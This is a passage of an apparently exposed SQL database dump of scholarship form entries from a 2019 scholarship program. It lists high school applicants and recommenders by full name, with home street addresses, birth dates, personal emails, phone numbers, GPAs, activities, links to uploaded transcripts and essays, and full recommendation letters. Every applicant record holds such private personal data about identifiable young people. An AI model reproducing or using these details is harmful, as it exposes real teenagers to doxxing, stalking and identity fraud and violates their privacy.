Graduate/Ambassador\r\n·         Planned a Trunk or Treat event at Cedar Lane School\r\n·         Lead in other small community activities\r\n2017 and 2018, Summer: Junior Counselor, Counselor\r\n·         Mentored 6-12 year old kids\r\n·         Taught skills to children  \r\n2015-Present: HcDrugFree\r\n·         Volunteer at events\r\n·         Promote the appropriate usage and disposal of drugs\r\n2015-Present: Teen Advisory Committee, High School Ambassador\r\n·         Organize events for high school and middle school students'),(3614,316,6,37,'University of Maryland, George Washington University, Penn State, Towson University,'),(3615,316,6,35,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2019/03/Julian-E-Basena_-Ruth-Conway-Scholarship-Essay.pdf'),(3616,316,6,33,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2019/03/Julian-E-Basena-_W-Ruth-Conway-Scholarship-_HS-Transcript.pdf'),(3617,316,6,34,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2019/03/Julian-E-Basena_-W-Ruth-Conway-Scholarship_-Release-Form.pdf'),(3618,317,8,1.3,'Yvonne'),(3619,317,8,1.6,'Walker Tolson'),(3620,317,8,11,'Ebenezer Baptist Church/Alexandria, Virginia'),(3621,317,8,12,'Chair, Media Ministry'),(3622,317,8,2,'ywalkertolson@hotmail.com'),(3623,317,8,3,'Albert D. Jackson'),(3624,317,8,4,'5 1/2 years'),(3625,317,8,5,'Other'),(3626,317,8,6,'I chair the Media Ministry at our church...Albert has been a dedicated member of the team for 5 years.'),(3627,317,8,7,'Excellent'),(3628,317,8,9,'Excellent'),(3629,317,8,8,'Excellent'),(3630,317,8,14,'Albert D. Jackson is a very responsible young man.  It is a pleasure to serve with him at church, he\'s so dependable.  Albert began serving in the Media Ministry at the church five years ago...he is very observant and learns quickly.  Within a very short period, Albert was able to manage the responsibilities necessary to ensure all was in place when service began.  During the time I had to be out for an extended period or on short notice, Albert was and still is one of the persons I turn to on the team, because I have confidence in his abilities to execute as required.  He knows what to do with very little guidance (because he listens and asks questions while he\'s learning).\r\n\r\nIn my observation of Albert over the years, I find he has a caring and quiet spirit.  He does not say much at first, until he feels safe, then he will open up and share. I watched Albert look after his sisters during service with authority. I was impressed, he was a teenager, but it was obvious that his younger sisters respected him and followed his lead (even now).\r\n\r\nNeedless to say, based on what you have read in my comments, you can tell that I adore Albert.  He is a smart young man (3.83 GPA) and has a bright future in front of him.  Albert will be a successful and contributing individual to society; it is simply who he is and what has been instilled in him.  I pray he reaches heights that are inconceivable...the sky is only the beginning; the possibilities are infinite for him!\r\n\r\nI highly recommend that your organization grant Albert a scholarship to help him as he matriculates onto higher education at the college or university of his choice.  It will be an investment that will yield a return greater than you can imagine.\r\n\r\nI pray grace and mercy for Albert as he transitions into this new phase of his life journey.'),(3631,317,8,16,'Highly recommended'),(3632,318,6,18.3,'Albert'),(3633,318,6,18.6,'Jackson'),(3634,318,6,19.1,'8206 Mary Lee Lane'),(3635,318,6,19.3,'Laurel'),(3636,318,6,19.4,'Maryland'),(3637,318,6,19.5,'20723'),(3638,318,6,19.6,'United States'),(3639,318,6,4,'12/11/00'),(3640,318,6,21,'ajacksonbball11@gmail.com'),(3641,318,6,20,'(240) 370-9359'),(3642,318,6,10,'Atholton High School'),(3643,318,6,27,'BSAP Advisor'),(3644,318,6,28,'N/A'),(3645,318,6,9,'3.48 (4.27)'),(3646,318,6,26,'Biology/ Pre Medicine'),(3647,318,6,12,'NA'),(3648,318,6,14,'As a senior, I am actively engaged in the Alpha Achievers mentoring program, as well as the Black Student Union. I am also Team Captain for the Varsity Men’s Basketball Team. I was also inducted into the National Honors Society last year. During my junior year, I was Chair of the Environmental Club at Mount Saint Joseph High School.  My community service begins with, but is not limited to my church. I am actively engaged in the Jesus Cares Ministry and Media Ministry. Jesus Cares, is a community service ministry where we have been feeding the homeless near our church in Alexandria, Virginia every third Saturday of every month for the past 5 years. We also provide them with fresh clothes and toiletries.'),(3649,318,6,13,'My scholastic honors and academic accomplishments include making the Principal’s List for high academic achievements during my ninth-grade year from 2015- 2016. Additional honors include obtaining First Honors by maintaining A’s and B\'s during my ninth, tenth, and eleventh grade years from 2015-2017. Also, I made the Gold List for high academic achievement during my senior year at Atholton High School during 2018-2019. The highest academic accomplishment I have obtained to date has been my induction into the National Honors Society last year.'),(3650,318,6,36,'Ebenezer Baptist Church, Jesus Cares Homeless Ministry,  (feeding the homeless), 2013- present\r\nEbenezer Baptist Church, Youth Ministry, 2013- present\r\nEbenezer Baptist Church, Media Ministry, 2013- present\r\nAlpha Achievers, various community service activities, 2018- present\r\nBlack Student Union, various community service activities, 2018- present\r\nO\'Neil Peer Education Program, peer mediation, 2017-2018\r\nArchytas Prime Robotics Team Volunteer, 2017- present\r\nLott Carey Youth Seminar Student, various community service activities, 2017-present'),(3651,318,6,37,'Xavier University of Louisiana\r\nAlbright College\r\nHoward University\r\nLoyola University Maryland\r\nUniversity of Maryland Baltimore County'),(3652,318,6,35,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2019/03/W-Ruth-Conway-Essay.docx'),(3653,318,6,33,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2019/03/W-Ruth-Conway-unofficial-transcript.pdf'),(3654,318,6,34,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2019/03/W-Ruth-Conway-Photo-Release-Form.pdf'),(3655,319,6,18.3,'Aniyah'),(3656,319,6,18.6,'Nelson'),(3657,319,6,19.1,'10105 Summer Glow Walk'),(3658,319,6,19.3,'Laurel'),(3659,319,6,19.4,'MD'),(3660,319,6,19.5,'20723'),(3661,319,6,19.6,'United States'),(3662,319,6,4,'11-18-01'),(3663,319,6,21,'aniyahnelson@hotmail.com'),(3664,319,6,20,'(301) 678-3027'),(3665,319,6,10,'Atholton High School'),(3666,319,6,27,'BSAP Advisor'),(3667,319,6,28,'N/A'),(3668,319,6,9,'3.33'),(3669,319,6,26,'Political Science'),(3670,319,6,12,'NA'),(3671,319,6,14,'Black Student Union (2015-2019; Sergeant of Arms 2018-2019 )\r\nDelta Scholars (2017-2019)\r\nSister to Sister (2017-2019)\r\nStudent Government Association (2015-2019)'),(3672,319,6,13,'Gold Honor Roll 2015, 2016, 2017, 2018, 2019'),(3673,319,6,36,'Make a Wish Foundation - Performed at the Give the Kids the World Village for terminally ill children(February 2018)\r\n Meals on Wheels - Delivered meals to the elderly in the community(May 2018)\r\n  Girl Scouts - Helped lead various activities(January 2019, April 2019)\r\n Student Government Association - Helped plan, design, and hang homecoming decoration(October 2015-2018) \r\nOperation Welcome Home - Prepared and distributed welcome home bags to deployed soldiers(April 2018) \r\nEmerson Community Association - Organized and executed various neighborhood activities(2015-2019)'),(3674,319,6,37,'Florida Agricultural and Mechanical University'),(3675,319,6,35,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2019/03/W.-Ruth-Scholarship.docx'),(3676,319,6,33,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2019/03/Transcript-2.pdf'),(3677,319,6,34,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2019/03/release-Form-2.pdf'),(3678,320,6,18.3,'Kyle'),(3679,320,6,18.6,'Wright'),(3680,320,6,19.1,'7138 DANIEL JOHN DRIVE'),(3681,320,6,19.3,'ELKRIDGE'),(3682,320,6,19.4,'Maryland'),(3683,320,6,19.5,'21075'),(3684,320,6,19.6,'United States'),(3685,320,6,4,'04-21-01'),(3686,320,6,21,'kyle.c.wright@gmail.com'),(3687,320,6,20,'(410) 660-0252'),(3688,320,6,10,'Howard High School'),(3689,320,6,27,'School Counselor/Advisor'),(3690,320,6,28,'N/A'),(3691,320,6,9,'3.89'),(3692,320,6,26,'Computer Science'),(3693,320,6,12,'9 (Dual Enrollment: HCC)'),(3694,320,6,14,'N/A'),(3695,320,6,13,'Principal’s Honor Roll (2016, 2017, 2018, 2019)'),(3696,320,6,36,'Elkridge Food Pantry (May 2018 - Present)\r\nBTST Christmas Toy Drive (December 2018)\r\nBTST Thanksgiving Food Drive (November 2018)\r\nBTST Back to School Drive (August 2018)\r\nRonald McDonald House - Walk By Faith Ministries (August 2018)\r\nBTST Christmas Toy Drive (December 2017)'),(3697,320,6,37,'University of Maryland Baltimore County (UMBC)'),(3698,320,6,35,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2019/03/ruthconwayessay.pdf'),(3699,320,6,33,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2019/03/KyleWrightTranscripts.pdf'),(3700,320,6,34,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2019/03/photo_release.pdf'),(3701,321,6,18.3,'Morgan'),(3702,321,6,18.6,'Young'),(3703,321,6,19.1,'10311 Twin Rivers Road'),(3704,321,6,19.3,'Columbia'),(3705,321,6,19.4,'Maryland'),(3706,321,6,19.5,'21044'),(3707,321,6,19.6,'United States'),(3708,321,6,4,'07-16-01'),(3709,321,6,21,'myoung3597@gmail.com'),(3710,321,6,20,'(410) 961-2455'),(3711,321,6,10,'Atholton High School'),(3712,321,6,27,'BSAP Advisor'),(3713,321,6,28,'N/A'),(3714,321,6,9,'3.32'),(3715,321,6,26,'Psychology'),(3716,321,6,12,'7.00'),(3717,321,6,14,'- National Honor Society: Two years of membership\r\n- Delta Scholars: Three years of membership; Treasurer\r\n- Army Junior Reserve Officer Training Corps: Four years of membership; Company Executive Officer, Battalion Commander\r\n- Rho Kappa National Social Studies Honor Society: One year of membership'),(3718,321,6,13,'Student of the Month: 2016\r\nNominated for Princeton Alumni Association of Maryland\'s Book Award Program: 2018\r\nGold Honor Roll: 2015, 2016, 2017, 2018, 2019'),(3719,321,6,36,'Blessing Bags (JROTC): Tasked with creating the list of items to be donated, encouraging people to donate, taking inventory of the items collected, and overseeing the creation of the bags. (12/15/16, 12/18/17, 3/7/19, 3/8/19, 3/11/19-3/15/19, 3/19/19-3/22/19)\r\n\r\nMiddle School Band Assessments: Escort a middle school band and their director throughout their assessment day; administer sight-reading music to the band members in the sight-reading room. (3/11/19-3/14/19)\r\n\r\nSchool Support: Volunteer to help with any school event when necessary through organizations including but not limited to; National Honor Society, JROTC, Delta Scholars, and the Atholton High School Music Department. (1/14/16, 4/28/16, 5/26/16, 6/2/16, 8/8/16, 8/25/16, 8/26/16, 10/22/16, 10/26/16, 4/26/17, 5/22/17, 6/7/17, 8/1/17, 8/7/17, 8/8/17, 8/9/17, 8/15/17, 8/17/17, 8/22/17, 8/23/17, 8/28/17, 8/31/17, 9/21/17, 6/5/18, 6/6/18, 7/12/18, 7/26/18, 8/7/18, 8/8/18, 8/14/18, 8/21/18,  8/22/18, 10/6/18, 10/27/18, 11/11/18, 1/3/19, 1/31/19, 2/2/19)\r\n\r\nBreast and Prostate Cancer Awareness Campaign (JROTC): Oversee and contribute to the fundraising efforts for breast and prostate cancer awareness. All proceeds were donated to the Walter Reed Veteran’s Medical Center to their respective divisions. Presented the checks to the directors of each respective treatment center in the fall of 2018. (9/28/17, 10/22/19-10/26/19, 12/17/18)\r\n\r\nBaby Clothes Sorting (Delta Scholars): Responsible for promoting the project and finding volunteers along with the organization of incoming items as well as updating a spreadsheet of the inventory of the entire closet. (Dates were every* Tuesday and Thursday from December 2016-June 2017)\r\n*This only includes dates that school was in session.'),(3720,321,6,37,'Mount St. Mary\'s University'),(3721,321,6,35,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2019/03/Ruth-Conway-Scholarship-App.docx'),(3722,321,6,33,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2019/03/MYoung-Transcripts.docx'),(3723,321,6,34,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2019/03/MLYoung_Zeta-Photo-Release-Form.pdf'),(3724,322,6,18.3,'Wande'),(3725,322,6,18.6,'Sogbesan'),(3726,322,6,19.1,'10577 Glen Hannah Dr'),(3727,322,6,19.3,'Laurel'),(3728,322,6,19.4,'Maryland'),(3729,322,6,19.5,'20723-1259'),(3730,322,6,19.6,'United States'),(3731,322,6,4,'11-17-2000'),(3732,322,6,21,'wandesho00@yahoo.com'),(3733,322,6,20,'(240) 470-8626'),(3734,322,6,10,'Atholton High School'),(3735,322,6,27,'BSAP Advisor'),(3736,322,6,28,'n/a'),(3737,322,6,9,'3.83'),(3738,322,6,26,'political science'),(3739,322,6,12,'n/a'),(3740,322,6,14,'Black Student Union: Vice President; involved for 3 years \r\nStudent Government: General member for 3 years\r\nSpanish National Honors Society: General member for 2 years\r\nNational Honors Society: General member for 2 years\r\nDelta Scholars: General member for 3 years'),(3741,322,6,13,'Honor roll recipient every quarter through the past 4 academic school years (2015-2019)\r\nNational Honors Society member (2018): Student has maintained at least a 3.5 cumulative GPA beginning freshman year and must be kept to remain a member in good standing.\r\nDelta Scholars member (2017): Student has maintained at least a 3.0 cumulative GPA beginning freshman year and must be kept to remain a member in good standing.'),(3742,322,6,36,'Grassroots Crisis Intervention Center: Spend time and provided academic help to the various children residing at Grassroots and help organize materials around the center. Recurs every tuesday. \r\nGirls on the Run (December 2018): Girls on the Run is an organization formed to empower young girls into feeling confident and capable to accomplish each of their goals. An annual 5k run is organized in order to raise money and awareness for the club.'),(3743,322,6,37,'Temple University\r\nUniversity of Florida\r\nGeorgia State University\r\nHoward University'),(3744,322,6,35,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2019/03/W.-Ruth-Conway-Scholarship.docx'),(3745,322,6,33,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2019/03/Unofficial-Transcript.docx'),(3746,322,6,34,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2019/03/Blank-1.pdf'),(3747,323,6,18.3,'Ergine'),(3748,323,6,18.6,'Remy'),(3749,323,6,19.1,'6601 Oxhorn Ct'),(3750,323,6,19.3,'Columbia'),(3751,323,6,19.4,'MD'),(3752,323,6,19.5,'21044'),(3753,323,6,19.6,'United States'),(3754,323,6,4,'12-13-01'),(3755,323,6,21,'ergine12@GMAIL.COM'),(3756,323,6,20,'(443) 980-8635'),(3757,323,6,10,'Atholton High School'),(3758,323,6,27,'Other'),(3759,323,6,28,'I saw it on a bulletin in my school\'s corridor'),(3760,323,6,9,'3.81'),(3761,323,6,26,'Biology'),(3762,323,6,12,'NA'),(3763,323,6,14,'2016-Present  Delta Scholars(Honor Society)\r\n              -Help promote academic excellence in girls and give back to the \r\n               community(Leadership Position in Welcoming Committee).\r\n 2016-2017 RDP Sports Camp\r\n               -Had to look after thirteen kids around the ages 7-9. I had to make sure they behaved \r\n                 and played with sportmanship\r\n2016-Present   National French Honor Society\r\n              -Tutor students who are having difficulty in French. Promote french culture at school.\r\n2018-Present   National Honor Society\r\n	     -(Leadership Position in Teacher Appreciation Committee)\r\n2018-Present   Science Honor Society\r\n             -Promote Science at school. Tutor students who are having difficulty in Science subject\r\n2018-Present Sister2Sister\r\n	      -A group that focuses on sisterhood and giving back to the community. \r\n2016-Present Pre-Medicine Club\r\n              -Research branches of the medical field. Discuss the MCAT. Became CPR certified in Adult, Child, and \r\n                Infant.\r\n2018-Present Share the Music Club\r\n             -Promoting music to the school and community. Playing classical concertos and sonatas at Senior Living \r\n              Centers(Performer - Violin).\r\n2017-Present Feed the Future\r\n	     -A club that works to fight hunger in our community.'),(3764,323,6,13,'2016  Recieved Honors on the National French Laureate Exam\r\n2016  Student of the Month (September/October) \r\n2017  Recieved Honorable Mentions on the National French Laureate Exam\r\n2017  Certificate of Achievement awarded by The Council of Elders of the Black Community of Howard County.\r\n2018  Recieved Honorable Mentions on the National French Laureate Exam'),(3765,323,6,36,'2016    Mattress Fundraiser\r\n                 -Help raise funds for the Atholton music booster to buy new instruments.\r\n2016  	Camp RDP\r\n                 -Volunteered at sports camp, instill in the children sportsmanship and good values. \r\n                Assisted in excursions.\r\n2016    Sunrise living center\r\n                 -Give wholesome association to the elderly. Gave them free manicures and sang \r\n                 karaoke to entertain them.\r\n2017     Pasta Dinner\r\n                 -Helped in the kitchen to serve food.\r\n2017    Club fair\r\n                 -Inform people about delta scholars and give out free prizes.\r\n2017    Moveable Feast\r\n                 -Make meals for ones dealing with HIV/AIDS.\r\n2017   	Delta Scholars\r\n                 -Help put decorations for the induction ceremony.\r\n2017 	Rake Leaves\r\n                 -Clean up the leaves for an elderly neighbor.\r\n2017   	Charity’s Closet\r\n                -Sort donated clothes where all funds are given to “Style Success”, an organization \r\n                that gives free business attire to ones with low incomes for job interview.\r\n2017    National Honor Society \r\n                -Help set up the banquet for after the national honor society induction ceremony.\r\n2018    Feed the Future\r\n                  -Help manage a relief drive at school to help those affected by the Ellicott City \r\n                   flood. \r\n2018    Johns Hopkins Hospital\r\n                -Helped patients, doctors and medical professors in the ICU and around the hospital. \r\n                 Gained communication skills.\r\n2018 	Coat Drive\r\n                 -Provided coats to those living in grassroots(homeless shelter).\r\n 02/02/2019     Dance Competition \r\n                                   - Volunteered as an usher/security guard for the POMS dance competition \r\n                                     at school.	\r\n02/12/2019 Delta Scholars\r\n				   -Volunteered and donated books for the school.\r\n02/22/2019 Black Student Union Assembly \r\n                                  -Participated in the assembly and helped coordinate backstage during the \r\n                                  show.\r\n02/25/2019 Red Cross Club\r\n                                 -Hosted clothes drive for the Charlotte Hall Veterans Home in Virginia.\r\n03/08/2019 Feed the future\r\n			        -Collected donated cans to send to the Howard County Food Bank\r\n3/13/2019 National Science Honor Society\r\n		        	-Tutored students having difficulty in science related subjects.\r\n3/18/2019 National Science Honor Society\r\n			       -Tutored student Having difficulty in science related subjects.'),(3766,323,6,37,'Howard Community College(Transfer)\r\nJohns Hopkins University\r\nUniversity of Maryland - Baltimore County\r\nHoward University\r\nUniversity of Maryland - College Park'),(3767,323,6,35,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2019/03/Ruth-Conway-ESSAY.pdf'),(3768,323,6,33,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2019/03/Ergine-Unoffficial.pdf'),(3769,323,6,34,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2019/03/Documents-Ruth-Conway.pdf'),(3770,324,6,18.3,'Danielle'),(3771,324,6,18.6,'Floyd'),(3772,324,6,19.1,'6486 Empty Song Rd'),(3773,324,6,19.3,'Columbia'),(3774,324,6,19.4,'Maryland'),(3775,324,6,19.5,'21044'),(3776,324,6,19.6,'United States'),(3777,324,6,4,'07-09-01'),(3778,324,6,21,'daniellefloyd5736@gmail.com'),(3779,324,6,20,'(410) 564-4101'),(3780,324,6,10,'Atholton High School'),(3781,324,6,27,'BSAP Advisor'),(3782,324,6,28,'N/A'),(3783,324,6,9,'3.55'),(3784,324,6,26,'Biology'),(3785,324,6,12,'NA'),(3786,324,6,14,'Organization: Delta Scholars\r\n years of membership: 4 \r\n Leadership Position: Secretary\r\nDescription: Assists with the organization and production of volunteering events and presentations to inform women of the importance of minorities in STEM.\r\n\r\nOrganization:  Science National Honor Society \r\nYear of membership: 2 \r\nDescription: Provided tutoring for students on the foundations of biology, throughout the school year attended seminars from doctors about the medical field\r\n\r\nOrganization: Student Leadership Cadre\r\nYears of Membership: 2\r\nDescription: Serve as student\'s body voice,engrossed in monthly mediate discussion with the principle and key staff members about important issues in our school.'),(3787,324,6,13,'Gold Honor Roll \r\nmaintained above 3.5 Weighted GPA all four years of high school.\r\n\r\nCelebration of Excellence \r\nhonoring Black seniors in Howard County Public Schools System who have an above 3.0 unweighted GPA'),(3788,324,6,36,'Organization: Junior R.O.T.C \r\nActivity: I cumulated a total of 205 service hours from volunteering. I lead multiple volunteer opportunities such as the 5k police pace and running of school events.\r\nDates: 08/15-09/19\r\n\r\nOrganization: Black Student Union\r\nActivity: Over the summer of my junior year, I volunteered at the Black Student Achievement Program where I assisted the P.E teacher in teaching healthy habits. I earned a total of 110 hours. \r\nDates: 07/18-08/18\r\n\r\nOrganization: National Honor Society\r\nActivity: I was an unpaid math tutor for high school students in algebra I and II. We meet consistently every Tues and Wed after school. I earned in total 32 hours.  \r\nDates: 03/17-05/17'),(3789,324,6,37,'Spelman College \r\nUniversity of Pittsburgh \r\nUniversity of California-Davis'),(3790,324,6,35,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2019/03/Copy-of-Transcipt.pdf'),(3791,324,6,33,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2019/03/Doc-Mar-26-2019-13_20.pdf'),(3792,324,6,34,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2019/03/Scholarship-Supplements.docx'),(3793,325,8,1.3,'Gael'),(3794,325,8,1.6,'Toussaint'),(3795,325,8,11,'RDPS Sports Camp'),(3796,325,8,12,'Administrator'),(3797,325,8,2,'gtouss92@yahoo.com'),(3798,325,8,3,'Ergine Remy'),(3799,325,8,4,'4 years.'),(3800,325,8,5,'Advisor/Counselor'),(3801,325,8,7,'Excellent'),(3802,325,8,9,'Excellent'),(3803,325,8,8,'Excellent'),(3804,325,8,14,'On a personal basis, Ergine Remy has become a good friend and is always focused on pursuing excellence. She is extremely engaged in her community and assisting others. Ergine embraces challenging situations and focuses on how each experience will enable her to grow into the professional she desires to become. Ms. Ergine Remy is outstanding. Without hesitation or reservation, I recommend Ms. Remy as she would be a good recipient for this scholarship.'),(3805,325,8,15,'https://zphiblgz.org/wp-content/uploads/gravity_forms/8-2ec429283182b0327184423c694c72d5/2019/03/Reference-Letter-for-Ergine-Remy.pdf'),(3806,325,8,16,'Highly recommended'),(3807,326,8,1.3,'Jason'),(3808,326,8,1.6,'Kolasinski'),(3809,326,8,11,'Oakland Mills High School'),(3810,326,8,12,'Teacher'),(3811,326,8,2,'Jason_Kolasinski@hcpss.org'),(3812,326,8,3,'Justine Andrea Wabo'),(3813,326,8,4,'7 Months'),(3814,326,8,5,'Teacher/Professor'),(3815,326,8,7,'Excellent'),(3816,326,8,9,'Average'),(3817,326,8,8,'Excellent'),(3818,326,8,14,'To Whom It May Concern, \r\nHello there, my name is Jason Kolasinski and I have the pleasure of teaching Andrea Wabo in my fifth period Senior Honors English course. Andrea was one of my top performing students since first quarter and she never strayed from the top five percent of my class. The Senior Honors English course that I run is no easy walk in the park; these students are held to a higher standard in a rather competitive nature. Andrea immediately stood out to me as a character of noble, clever, and adaptive abilities. \r\n\r\nThe word ‘noble’ may be dated and out of use in today’s society, but it is more than fitting for Andrea. She not only dresses herself in fine titled qualities, but her high moral principles and ideals truly distinguish her as worthy of praise. She will accomplish great things, I have no doubt in my mind about that. Any scholarship is more than merited simply by this one defining quality of her person. Whereas other students may try to cheat and scamper their way through high school, Andrea has stayed true to her noble personality and strict moral code. That statement is not meant to be taken lightly, and truly cannot be said of all of my students. Scholarships are not a trifle for her, they are not the end¬game to some lofty scheme. She will use any and all adornments as legitimate resources to further her position heading into college. That foresight in a student so young is incredible and she is more than worthy to accomplish whatever task that may befall her in your program. \r\n\r\nWhen it comes to writing, whether it be for a research paper, poetry, extended essay, or prose, Andrea’s abilities and talents can be described as nothing short of clever. Not only does she grasp concepts as a whole brighter than most, her insights to the fine itty-bitty details are spectacular as well. Andrea is more than intelligent in her learning, quick to comprehend and able to apply abstract ideas, her writing skills are truly, truly clever. \r\n\r\nMy class is often driven by classroom discussions and lectures. Though I may be still within my rookie years of teaching, old-school practices fit best with my style and structure. Lectures are mostly defined by myself, but when it comes to classroom discussions, I look to the students to lead the general class flow. Andrea is one of my leaders. When other students choose to sit back and participate only when prodded, I have never had that issue with her. Not only will she contribute to the overall conversation, she will purposefully play the devil’s advocate at times, and I cannot be more proud of her because of that. She is adaptable. To be able to think ‘outside of the box,’ to challenge the status quo in order to gain better understanding, to change perspective for a larger purpose; these aspects define how Andrea thinks and how she contributes to the betterment of society. She is capable of great things, and though I have all the faith in the world in her, even if she fails at times (something inevitable for everyone in my mind), I also know that she will adapt in order to not only survive, but to thrive. \r\n\r\nAndrea Wabo not only merits, but deserves any and all scholarships available to her. Her character and abilities distinguish her as a cut above the rest, and it would be foolish to put her nature to waste. I hope if anything this recommendation letter shed a sliver of the potential that my student has. I cannot be any more proud and honored for her to ask for my assistance, and I hope that this letter has done some justice to the noble, clever, and adaptable young adult to whom I am privileged to teach. Thank you for your time and consideration. \r\n\r\nSincerely, \r\nJason Kolasinski'),(3819,326,8,16,'Highly recommended'),(3820,327,8,1.3,'Duana'),(3821,327,8,1.6,'Chandler'),(3822,327,8,11,'Hammond High School'),(3823,327,8,12,'Teacher'),(3824,327,8,2,'duana_chandler@hcpss.org'),(3825,327,8,3,'Chelsea Amihere'),(3826,327,8,4,'3 years'),(3827,327,8,5,'Teacher/Professor'),(3828,327,8,7,'Excellent'),(3829,327,8,9,'Excellent'),(3830,327,8,8,'Excellent'),(3831,327,8,15,'https://zphiblgz.org/wp-content/uploads/gravity_forms/8-2ec429283182b0327184423c694c72d5/2019/03/Letter-of-Recommendation_Chelsea.pdf'),(3832,327,8,16,'Highly recommended'),(3833,328,8,1.3,'Yvonne'),(3834,328,8,1.6,'Rogers'),(3835,328,8,11,'Atholton High School'),(3836,328,8,12,'School Counselor'),(3837,328,8,2,'yvrogers2@gmail.com'),(3838,328,8,3,'Yewande Sogbesan'),(3839,328,8,4,'For four years'),(3840,328,8,5,'Advisor/Counselor'),(3841,328,8,7,'Excellent'),(3842,328,8,9,'Excellent'),(3843,328,8,8,'Excellent'),(3844,328,8,15,'https://zphiblgz.org/wp-content/uploads/gravity_forms/8-2ec429283182b0327184423c694c72d5/2019/03/AHS-Ltr-of-Rec-19-Yewande-Sogebesan.docx'),(3845,328,8,16,'Highly recommended'),(3846,329,8,1.3,'Jason'),(3847,329,8,1.6,'Kolasinski'),(3848,329,8,11,'Oakland Mills High School'),(3849,329,8,12,'Teacher'),(3850,329,8,2,'Jason_Kolasinski@hcpss.org'),(3851,329,8,3,'Justine Andrea Wabo'),(3852,329,8,4,'7 Months'),(3853,329,8,5,'Teacher/Professor'),(3854,329,8,7,'Excellent'),(3855,329,8,9,'Average'),(3856,329,8,8,'Excellent'),(3857,329,8,14,'To Whom It May Concern, \r\nHello there, my name is Jason Kolasinski and I have the pleasure of teaching Andrea Wabo in my fifth period Senior Honors English course. Andrea was one of my top performing students since first quarter and she never strayed from the top five percent of my class. The Senior Honors English course that I run is no easy walk in the park; these students are held to a higher standard in a rather competitive nature. Andrea immediately stood out to me as a character of noble, clever, and adaptive abilities. \r\n\r\nThe word ‘noble’ may be dated and out of use in today’s society, but it is more than fitting for Andrea. She not only dresses herself in fine titled qualities, but her high moral principles and ideals truly distinguish her as worthy of praise. She will accomplish great things, I have no doubt in my mind about that. Any scholarship is more than merited simply by this one defining quality of her person. Whereas other students may try to cheat and scamper their way through high school, Andrea has stayed true to her noble personality and strict moral code. That statement is not meant to be taken lightly, and truly cannot be said of all of my students. Scholarships are not a trifle for her, they are not the end¬game to some lofty scheme. She will use any and all adornments as legitimate resources to further her position heading into college. That foresight in a student so young is incredible and she is more than worthy to accomplish whatever task that may befall her in your program. \r\n\r\nWhen it comes to writing, whether it be for a research paper, poetry, extended essay, or prose, Andrea’s abilities and talents can be described as nothing short of clever. Not only does she grasp concepts as a whole brighter than most, her insights to the fine itty-bitty details are spectacular as well. Andrea is more than intelligent in her learning, quick to comprehend and able to apply abstract ideas, her writing skills are truly, truly clever. \r\n\r\nMy class is often driven by classroom discussions and lectures. Though I may be still within my rookie years of teaching, old-school practices fit best with my style and structure. Lectures are mostly defined by myself, but when it comes to classroom discussions, I look to the students to lead the general class flow. Andrea is one of my leaders. When other students choose to sit back and participate only when prodded, I have never had that issue with her. Not only will she contribute to the overall conversation, she will purposefully play the devil’s advocate at times, and I cannot be more proud of her because of that. She is adaptable. To be able to think ‘outside of the box,’ to challenge the status quo in order to gain better understanding, to change perspective for a larger purpose; these aspects define how Andrea thinks and how she contributes to the betterment of society. She is capable of great things, and though I have all the faith in the world in her, even if she fails at times (something inevitable for everyone in my mind), I also know that she will adapt in order to not only survive, but to thrive. \r\n\r\nAndrea Wabo not only merits, but deserves any and all scholarships available to her. Her character and abilities distinguish her as a cut above the rest, and it would be foolish to put her nature to waste. I hope if anything this recommendation letter shed a sliver of the potential that my student has. I cannot be any more proud and honored for her to ask for my assistance, and I hope that this letter has done some justice to the noble, clever, and adaptable young adult to whom I am privileged to teach. Thank you for your time and consideration. \r\n\r\nSincerely, \r\nJason Kolasinski'),(3858,329,8,16,'Highly recommended'),(3859,330,6,18.3,'Kayla'),(3860,330,6,18.6,'Mack-Easley'),(3861,330,6,19.1,'158 Goldsborough Dr'),(3862,330,6,19.3,'Odenton'),(3863,330,6,19.4,'Maryland'),(3864,330,6,19.5,'21113'),(3865,330,6,19.6,'United States'),(3866,330,6,4,'03-02-01'),(3867,330,6,21,'kaylamoore169@yahoo.com'),(3868,330,6,20,'(443) 889-0488'),(3869,330,6,10,'Atholton High School'),(3870,330,6,27,'BSAP 